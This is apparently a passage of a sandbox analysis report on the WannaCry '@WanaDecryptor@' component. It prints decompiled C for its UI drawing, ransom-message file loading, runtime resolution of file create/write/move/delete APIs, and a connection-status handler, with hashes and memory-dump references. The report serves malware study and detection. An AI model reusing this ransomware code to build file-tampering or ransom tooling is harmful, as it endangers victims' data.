                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                  • #1641.MFC42(00000000), ref: 0040331F
                                  • #3092.MFC42(00000408,00000000), ref: 0040332B
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                  • #3092.MFC42(00000409), ref: 00403353
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                  • #3092.MFC42(00000002), ref: 00403372
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                  • #3092.MFC42(0000040E), ref: 00403394
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                  • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                  • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                  • String ID: Arial$Path
                                  • API String ID: 2448086372-1872211634
                                  • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                  • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                  • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                  0x00406ae0
                                  0x00406ae2
                                  0x00406aed
                                  0x00406aee
                                  0x00406afc
                                  0x00406b03
                                  0x00406b08
                                  0x00406b0f
                                  0x00406b10
                                  0x00406b1b
                                  0x00406b20
                                  0x00406b29
                                  0x00406b2e
                                  0x00406b37
                                  0x00406b38
                                  0x00406b39
                                  0x00406b41
                                  0x00406b59
                                  0x00406b5b
                                  0x00406b62
                                  0x00406b6b
                                  0x00406b73
                                  0x00406b7d
                                  0x00406b86
                                  0x00406b88
                                  0x00406b91
                                  0x00406b96
                                  0x00406b9b
                                  0x00406b9c
                                  0x00406ba0
                                  0x00406ba8
                                  0x00406ba9
                                  0x00406bbb
                                  0x00406bbd
                                  0x00406bc4
                                  0x00406bcd
                                  0x00406bd5
                                  0x00406bd5
                                  0x00406be1
                                  0x00406bea
                                  0x00406bf5
                                  0x00406c03
                                  0x00406c10

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                  • String ID: English$m_%s.wnry$msg\
                                  • API String ID: 3713669620-4206458537
                                  • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                  • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                  • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                  0x00402c48
                                  0x00402d1d
                                  0x00402d20
                                  0x00402c4e
                                  0x00402c55
                                  0x00402c69
                                  0x00402c6d
                                  0x00000000
                                  0x00402c73
                                  0x00402c88
                                  0x00402c95
                                  0x00402ca2
                                  0x00402caf
                                  0x00402cbc
                                  0x00402cc9
                                  0x00402cce
                                  0x00402cd6
                                  0x00402cde
                                  0x00000000
                                  0x00402d16
                                  0x00402d1c
                                  0x00402d1c
                                  0x00402cde
                                  0x00402c57
                                  0x00402c5d
                                  0x00402c5d
                                  0x00402c55

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                  • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                  • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                  • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                  • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                  • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                  • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                  • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                                  • API String ID: 2238633743-1294736154
                                  • Opcode ID: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction ID: a2b5d8bb757b14b28e15fb80ad1863100e1319e91a413c2d323d0fcc62a15203
                                  • Opcode Fuzzy Hash: 468b1d099fd8a0684a95be66b91aae829347793d9c58d8a41e664e10bf98f029
                                  • Instruction Fuzzy Hash: AA110334B423216BD734AB25BD58FA72695EFD4701795003FA801E76E1D7B89C42CA5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405580 Relevance: 27.2, APIs: 18, Instructions: 187windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00405580(void* __ecx) {
				int _v8;
				intOrPtr _v12;
				char _v28;
				char _v80;
				void* _v96;
				struct tagRECT _v112;
				signed int _v116;
				void* _v120;
				struct HDC__* _v140;
				long _v144;
				struct tagRECT _v160;
				char _v164;
				void* _v172;
				intOrPtr _v176;
				char _v188;
				int _v192;
				int _v196;
				int _v204;
				intOrPtr _v212;
				void* _v216;
				struct HBRUSH__* _v220;
				char _v224;
				intOrPtr _v228;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				signed int _v256;
				void* _v260;
				void* _v264;
				void* _v268;
				int _v272;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				int _t78;
				long _t79;
				struct HBRUSH__* _t80;
				struct HDC__* _t84;
				char _t85;
				struct HBRUSH__* _t86;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t102;
				intOrPtr _t104;
				intOrPtr _t108;
				intOrPtr _t136;
				void* _t151;
				struct HBRUSH__* _t152;
				void* _t153;
				void* _t156;
				int _t160;
				intOrPtr _t162;

				_push(0xffffffff);
				_push(E00413943);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t162;
				_t156 = __ecx;
				_t78 = GetClientRect( *(__ecx + 0x20),  &_v112);
				_t160 = 0;
				_v204 = 0;
				_t108 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) - 8));
				_v176 = _t108;
				if(_t108 != 0) {
					L00412DD0();
					_t79 =  *(_t156 + 0x50);
					_v8 = 0;
					_v164 = 0xffb53f;
					_v160.left = _t79;
					_v160.top = 0x674017;
					_v160.right =  *((intOrPtr*)(_t156 + 0x4c));
					_v160.bottom = 0;
					_v144 =  *(_t156 + 0x54);
					L00412E5A();
					_t80 =  *((intOrPtr*)(_t79 + 8));
					__imp__#8(_t80,  *((intOrPtr*)(_t156 + 0x58)), 0,  &_v164, 3, _t156, _t151);
					_t152 = _t80;
					_v220 = _t152;
					L00412E54();
					asm("sbb eax, eax");
					_v28 = 1;
					_t84 = CreateCompatibleDC( ~( &_v120) & _v116);
					_push(_t84);
					L00412E4E();
					_push(_t152);
					L00412DE2();
					if(_t84 != 0) {
						_t84 =  *(_t84 + 4);
					}
					_push(_t84);
					_t85 = _v224;
					_push(_t85);
					L00412E48();
					_v212 = _t85;
					_t153 = 0;
					_v252 = 1;
					_t86 = CreateSolidBrush( *(_t156 + 0x54));
					_v220 = _t86;
					FillRect(_v140,  &_v160, _t86);
					_t89 = 0;
					_v260 = 0;
					if(_t108 > 0) {
						do {
							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
							E00405110(_t156,  &_v188, _v224);
							asm("sbb eax, eax");
							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
							_t102 =  *((intOrPtr*)(_t156 + 0x74));
							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
							_t153 = _t153 + 1;
							if(_t153 != _t102) {
								goto L10;
							} else {
								_t136 =  *((intOrPtr*)(_t156 + 0x70));
								if(_t136 != 1) {
									if(_t153 != _t102) {
										goto L10;
									} else {
										_t104 = _t136;
										if(_t104 <= 1) {
											goto L10;
										} else {
											if(_v304 != _t104) {
												_t153 = 0;
												_t160 = 0;
												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
												_v304 = _v304 + 1;
												goto L10;
											}
										}
									}
								}
							}
							goto L11;
							L10:
							_t89 = _v296 + 1;
							_v296 = _t89;
						} while (_t89 < _v272);
					}
					L11:
					_t90 = _v228;
					if(_t90 != 0) {
						_t90 =  *((intOrPtr*)(_t90 + 4));
					}
					_push(_t90);
					_push(_v248);
					L00412E48();
					L00412E42();
					DeleteObject(_v264);
					_t78 = DeleteObject(_v244);
					_v80 = 0;
					L00412E3C();
					_v80 = 0xffffffff;
					L00412DB8();
				}
				 *[fs:0x0] = _v12;
				return _t78;
			}























































                                  0x00405580
                                  0x00405582
                                  0x0040558d
                                  0x0040558e
                                  0x0040559e
                                  0x004055a9
                                  0x004055b2
                                  0x004055b4
                                  0x004055b8
                                  0x004055bd
                                  0x004055c1
                                  0x004055d0
                                  0x004055d5
                                  0x004055de
                                  0x004055e5
                                  0x004055ed
                                  0x004055f1
                                  0x004055f9
                                  0x004055fd
                                  0x00405601
                                  0x00405605
                                  0x0040560d
                                  0x0040561a
                                  0x00405620
                                  0x00405626
                                  0x0040562a
                                  0x0040563f
                                  0x00405641
                                  0x0040564c
                                  0x00405652
                                  0x00405657
                                  0x0040565c
                                  0x0040565d
                                  0x00405664
                                  0x00405666
                                  0x00405666
                                  0x00405669
                                  0x0040566a
                                  0x0040566e
                                  0x0040566f
                                  0x00405677
                                  0x0040567c
                                  0x0040567e
                                  0x00405686
                                  0x0040568c
                                  0x0040569e
                                  0x004056a4
                                  0x004056a8
                                  0x004056ac
                                  0x004056b2
                                  0x004056bc
                                  0x004056c8
                                  0x004056e7
                                  0x0040570b
                                  0x00405719
                                  0x0040571c
                                  0x0040571e
                                  0x00405721
                                  0x00000000
                                  0x00405723
                                  0x00405723
                                  0x00405729
                                  0x0040572d
                                  0x00000000
                                  0x0040572f
                                  0x0040572f
                                  0x00405734
                                  0x00000000
                                  0x00405736
                                  0x0040573a
                                  0x0040574c
                                  0x0040574e
                                  0x00405753
                                  0x00405757
                                  0x00000000
                                  0x00405757
                                  0x0040573a
                                  0x00405734
                                  0x0040572d
                                  0x00405729
                                  0x00000000
                                  0x0040575b
                                  0x00405763
                                  0x00405766
                                  0x00405766
                                  0x004056b2
                                  0x00405770
                                  0x00405770
                                  0x00405777
                                  0x00405779
                                  0x00405779
                                  0x0040577c
                                  0x00405781
                                  0x00405782
                                  0x0040578b
                                  0x0040579b
                                  0x004057a2
                                  0x004057a8
                                  0x004057b0
                                  0x004057b9
                                  0x004057c4
                                  0x004057c4
                                  0x004057d3
                                  0x004057e0

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                  • String ID:
                                  • API String ID: 1233696098-0
                                  • Opcode ID: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                  • Opcode Fuzzy Hash: 3787f29b2f3b6759b14921245bb0c5350f6533f71f74a9e78965702df0d7f065
                                  • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408D70 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 257COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00408D70(intOrPtr __ecx, signed long long __fp0, intOrPtr* _a4, int _a8, signed int _a12, unsigned int _a16, signed int _a20) {
				intOrPtr _v0;
				unsigned int _v4;
				unsigned int _v8;
				unsigned int _v12;
				intOrPtr _v20;
				char _v36;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed long long _v100;
				intOrPtr _v104;
				void* _v108;
				void* _v112;
				void* _v120;
				unsigned int _t93;
				signed int _t96;
				signed int _t100;
				unsigned int _t102;
				signed int _t107;
				int _t112;
				char _t113;
				signed char _t115;
				RECT* _t122;
				signed int _t125;
				signed int _t134;
				intOrPtr* _t135;
				unsigned int _t138;
				signed int _t140;
				signed int _t143;
				intOrPtr* _t146;
				char _t151;
				char _t152;
				signed int _t169;
				intOrPtr* _t177;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t195;
				unsigned int _t202;
				char _t209;
				intOrPtr _t210;
				signed long long _t228;
				signed long long _t229;
				signed long long _t230;
				signed long long _t231;
				signed long long _t234;

				_t228 = __fp0;
				_push(0xffffffff);
				_push(E004140A0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t210;
				_t93 = _a20;
				_v104 = __ecx;
				_t138 = _a16;
				_t169 = _t138 & 0x000000ff;
				_v76 = _t169;
				_t192 = (_t93 & 0x000000ff) - _t169;
				_t140 = _t138 >> 0x00000010 & 0x000000ff;
				_t96 = (_t93 >> 0x00000010 & 0x000000ff) - _t140;
				_v88 = 0;
				_v96 = _t96;
				_v92 = _t140;
				asm("cdq");
				_t143 = _t96 ^ 0;
				_v100 = 0;
				asm("cdq");
				_a20 = _t192;
				_t134 = 0;
				if(0 <= _t143) {
					_t134 = _t143;
				}
				asm("cdq");
				_t100 = _t192 ^ 0;
				if(_t100 <= _t134) {
					_a16 = 0;
					if(0 <= _t143) {
						_a16 = _t143;
					}
				} else {
					_a16 = _t100;
				}
				_t193 = _a8;
				_t102 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				if(_t102 < _a16) {
					_a16 = _t102;
				}
				if(_a16 == 0) {
					_a16 = 1;
				}
				asm("fild dword [esp+0x88]");
				asm("fild dword [esp+0x8c]");
				_t135 = _a4;
				_t229 = _t228 / st1;
				_v80 = _t229;
				asm("fild dword [esp+0x1c]");
				_t230 = _t229 / st1;
				_v100 = _t230;
				asm("fild dword [esp+0x20]");
				_t231 = _t230 / st1;
				_v96 = _t231;
				st0 = _t231;
				_t107 = GetDeviceCaps( *( *_t135 + 8), 0x26) & 0x00000100;
				_v80 = _t107;
				if(_t107 == 0 && _a8 > 1) {
					_t125 = GetDeviceCaps( *( *_t135 + 8), 0xc);
					if(GetDeviceCaps( *( *_t135 + 8), 0xe) * _t125 < 8) {
						_v8 = 1;
					}
				}
				_t146 = _t193;
				_a12 =  *((intOrPtr*)(_t193 + 8)) -  *_t193;
				_t202 = 0;
				asm("fild dword [esp+0x8c]");
				_v72 = 0;
				_v68 =  *_t146;
				_v76 = 0x415a44;
				asm("fidiv dword [esp+0x88]");
				_v64 =  *((intOrPtr*)(_t146 + 4));
				_v60 =  *((intOrPtr*)(_t146 + 8));
				_v56 =  *((intOrPtr*)(_t146 + 0xc));
				_a12 = _t231;
				_t112 = _a8;
				_v12 = 0;
				_v4 = 0;
				if(_t112 <= 0) {
					L31:
					_v76 = 0x415c00;
					_v12 = 1;
					L00412D52();
					 *[fs:0x0] = _v20;
					return _t112;
				} else {
					while(1) {
						asm("fild dword [esp+0x7c]");
						_t195 =  *_t193;
						L0041304A();
						_t46 = _t202 + 1; // 0x1
						_v4 = _t46;
						_t209 = _t112 + _t195;
						asm("fild dword [esp+0x7c]");
						_v68 = _t209;
						_t234 = st0 * _a12 * _a12;
						L0041304A();
						_t113 = _t112 + _t195;
						_v60 = _t113;
						if(_t202 == _a8 - 1) {
							_t113 =  *((intOrPtr*)(_v0 + 8));
							_v60 = _t113;
						}
						_t177 = _a4;
						_t151 =  *_t177;
						if(_t113 < _t151) {
							goto L29;
						}
						if(_t209 < _t151) {
							_v68 = _t151;
						}
						_t152 =  *((intOrPtr*)(_t177 + 8));
						if(_t113 > _t152) {
							_v60 = _t152;
						}
						L0041304A();
						_v92 = 0;
						L0041304A();
						_t115 = _t113 + _v100 + _v96;
						_v92 = _t115 << 8;
						L0041304A();
						_push(_t115 + _v84 & 0x000000ff | _v92);
						if(_v80 == 0) {
							_t112 = E00409D40( &_v36, _t135,  &_v68);
							_push(_t112);
							L00412FF2();
						} else {
							_push(CreateSolidBrush());
							L00412D5E();
							_t122 = E00409D40( &_v60, _t135,  &_v76);
							_t76 =  &_v96; // 0x415a44
							asm("sbb ecx, ecx");
							_t112 = FillRect( *( *_t135 + 4), _t122,  ~_t76 & _v92);
							L00412D52();
						}
						if(_v68 <  *((intOrPtr*)(_v4 + 8))) {
							L30:
							_t202 = _v4;
							_t112 = _a8;
							_v4 = _t202;
							if(_t202 < _t112) {
								_t193 = _v0;
								continue;
							}
						}
						goto L31;
						L29:
						st0 = _t234;
						goto L30;
					}
				}
			}
























































                                  0x00408d70
                                  0x00408d70
                                  0x00408d72
                                  0x00408d7d
                                  0x00408d7e
                                  0x00408d88
                                  0x00408d8d
                                  0x00408d92
                                  0x00408d9f
                                  0x00408dab
                                  0x00408daf
                                  0x00408dc5
                                  0x00408dd6
                                  0x00408dd8
                                  0x00408dde
                                  0x00408de2
                                  0x00408de6
                                  0x00408def
                                  0x00408df1
                                  0x00408df5
                                  0x00408df8
                                  0x00408e05
                                  0x00408e07
                                  0x00408e09
                                  0x00408e09
                                  0x00408e0d
                                  0x00408e10
                                  0x00408e14
                                  0x00408e21
                                  0x00408e28
                                  0x00408e2a
                                  0x00408e2a
                                  0x00408e16
                                  0x00408e16
                                  0x00408e16
                                  0x00408e31
                                  0x00408e44
                                  0x00408e48
                                  0x00408e4a
                                  0x00408e4a
                                  0x00408e5a
                                  0x00408e5c
                                  0x00408e5c
                                  0x00408e67
                                  0x00408e6e
                                  0x00408e75
                                  0x00408e81
                                  0x00408e89
                                  0x00408e8d
                                  0x00408e91
                                  0x00408e93
                                  0x00408e97
                                  0x00408e9b
                                  0x00408e9d
                                  0x00408ea1
                                  0x00408ea5
                                  0x00408eaa
                                  0x00408eae
                                  0x00408ec2
                                  0x00408ed6
                                  0x00408ed8
                                  0x00408ed8
                                  0x00408ed6
                                  0x00408eea
                                  0x00408eec
                                  0x00408ef3
                                  0x00408ef5
                                  0x00408efe
                                  0x00408f02
                                  0x00408f06
                                  0x00408f0e
                                  0x00408f18
                                  0x00408f1f
                                  0x00408f26
                                  0x00408f2a
                                  0x00408f31
                                  0x00408f38
                                  0x00408f3e
                                  0x00408f42
                                  0x004090b6
                                  0x004090b6
                                  0x004090c2
                                  0x004090ca
                                  0x004090d7
                                  0x004090e1
                                  0x00408f48
                                  0x00408f51
                                  0x00408f51
                                  0x00408f55
                                  0x00408f60
                                  0x00408f65
                                  0x00408f6a
                                  0x00408f6e
                                  0x00408f70
                                  0x00408f74
                                  0x00408f78
                                  0x00408f7f
                                  0x00408f8b
                                  0x00408f8d
                                  0x00408f96
                                  0x00408f9f
                                  0x00408fa2
                                  0x00408fa2
                                  0x00408fa6
                                  0x00408fad
                                  0x00408fb1
                                  0x00000000
                                  0x00000000
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbb
                                  0x00408fbf
                                  0x00408fc4
                                  0x00408fc6
                                  0x00408fc6
                                  0x00408fd0
                                  0x00408fe5
                                  0x00408fe9
                                  0x00408ffa
                                  0x00409001
                                  0x00409005
                                  0x00409021
                                  0x00409022
                                  0x0040907e
                                  0x00409085
                                  0x00409086
                                  0x00409024
                                  0x0040902a
                                  0x0040902f
                                  0x00409043
                                  0x0040904e
                                  0x00409054
                                  0x0040905e
                                  0x00409068
                                  0x00409068
                                  0x00409099
                                  0x0040909f
                                  0x0040909f
                                  0x004090a3
                                  0x004090ac
                                  0x004090b0
                                  0x00408f4a
                                  0x00000000
                                  0x00408f4a
                                  0x004090b0
                                  0x00000000
                                  0x0040909d
                                  0x0040909d
                                  0x00000000
                                  0x0040909d
                                  0x00408f51

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
